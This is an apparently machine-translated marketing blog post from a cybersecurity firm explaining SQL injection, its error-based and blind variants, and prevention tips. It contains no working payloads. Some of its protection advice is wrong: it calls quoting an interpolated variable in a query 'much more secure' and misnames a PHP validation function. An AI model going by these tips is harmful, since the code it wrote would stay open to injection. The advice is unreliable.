Business Information Security – Cybersecurity Services

SQL INJECTION

the 14 most common cybercrimes

Marina Córdoba Poveda // 01 de noviembre de 2018

SQL CyberSecurity

2nd PART

The 14 most common cybercrimes

From R3 Cybersecurity we will talk about the most recurring cybercrimes that organizations and users face and how they can prevent them. For this, we have compiled the 14 most frequent cyber attacks and which you should be aware of in order to prevent them. These will be divided into two parts, each composed of 7 cybercrimes. You can see the publication of this content every week.

The days go by and there are still cases of information theft in both SMEs and large companies. British Airways is the latest victim of cybercriminals exploiting vulnerabilities to make a profit.

For this reason, from R3 CyberSecurity we offer another delivery on the 14 most common Internet cybercrimes. If you have not read the first installment dealing with the Ramsomware, I invite you to read it. For the delivery today, we will discuss the SQL Injection or SQL Injection attack. The most common attack to access databases.

SQL

To talk about SQL we must first mention the databases. A database is a standalone application that stores data. So we can say that it is a collection of information organized by fields, records and files, so that you can quickly select the pieces of data that are needed.

SQL (Structured Query Language) is a programming language for accessing databases that enables and facilitates data management for users. Unlike other languages, this language is not difficult to read and understand, even for inexperienced users.

SQL INJECTION

What is?

SQL INJECTION is a method of infiltration of code that uses a vulnerability that gains access to the database that is associated creating the possibility of modifying, eliminating or extracting all available information.

This attack is based on the “injection” of SQL commands into the input parameters of an HTTP request to expose the entire database from start to finish.

It is worth mentioning that it is one of the most common attacks due to its ease of execution and the appearance of new programs that perform it automatically using tools such as SQLMap. These factors cause them to increase exponentially over time.

What types of SQL injection attacks are there?

Within the attack we can find the following variants:

.SQL Injection: the web throws an error in a specific field when entering a single quote (‘). This allows the attacker to begin modifying the code.

Blind SQL Injection: there is no error in the web when executing the erroneous SQL statement. The attacker must make tests to find the name of the fields to be able to act.

HOW DOES IT INFECT?

SQL INGLES r3 CYBERSECURITY

PROTECTION MEASURES

 

In the face of such an attack it is very difficult to know if you have been attacked until it is too late. And you can only know it once the database is modified or stolen.

So the best way to avoid these attacks is through prevention. Therefore, from R3 CyberSecurity we offer the following tips: 

Avoid special characters when managing the SQL database. Avoid using common characters. In this programming language, the most commonly used are: (“/” or / x00). 

Use the single quotes. If you use single quotes to enter the value of a query, the instructions will be much more secure. SELECT name FROM users WHERE id_user = ‘$ id’. 

Grant minimum licenses to the user. It is an obvious advice but you should never use a root user with full access to all the databases. This makes the work much easier for cybercriminals.

Verify the data that the user enters. These can be achieved through functions such as ctype_digital () for number or ctype_alpha () for letters. As well as ensuring the length of the data. 

Marina Córdoba Poveda | Digital Marketing  Assistant en R3 CyberSecurity

Share with your friends

CON LA CONFIANZA DE

logos2

ÚNETE AL EQUIPO

Conoce todas las oportunidades profesionales que te permitirán alcanzar tus metas personales.

R3 Ciberseguridad

© R3 CyberSecurity